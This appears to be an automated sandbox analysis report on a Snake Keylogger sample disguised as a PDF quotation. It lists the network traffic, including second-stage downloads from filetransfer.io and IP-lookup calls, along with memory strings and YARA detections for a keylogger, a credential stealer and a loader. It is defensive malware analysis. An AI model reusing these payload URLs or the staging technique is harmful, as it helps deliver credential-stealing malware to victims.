Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49778 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/jI82Ms6K/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/gxyOEP84bSEs HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/jI82Ms6K/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s23.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A76C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A76C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/jI82Ms6K/download
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	String found in binary or memory: http://filetransfer.io/data-package/jI82Ms6K/download?exceptionsAllowedBeforeBreakingAValue
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE4F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A76C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7702000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/jI82Ms6K/download
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE7D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188p
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s23.filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7730000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7723000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s23.filetransfer.io/storage/download/gxyOEP84bSEs
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2328766008.000002C7B801D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2949416019.000002C619020000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2316760953.000002C7A79E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BA00A48	0_2_00007FFD9BA00A48
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BA15A2D	0_2_00007FFD9BA15A2D
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BA086B9	0_2_00007FFD9BA086B9
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BA00AF0	0_2_00007FFD9BA00AF0
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BA02591	0_2_00007FFD9BA02591
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C61904279C	4_2_000002C61904279C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C619042B78	4_2_000002C619042B78
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C619042FA8	4_2_000002C619042FA8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C6190418C0	4_2_000002C6190418C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C619046254	4_2_000002C619046254
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_000002C619043A5C	4_2_000002C619043A5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD9B8A0863	4_2_00007FFD9B8A0863

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7F2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7FA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000000.1691472736.000002C7A580A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEyrjvce.exeH vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2334844929.000002C7BFE80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameYnkbiiyb.dll" vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2336208720.000002C7C02D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Binary or memory string: OriginalFilenameEyrjvce.exeH vs QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
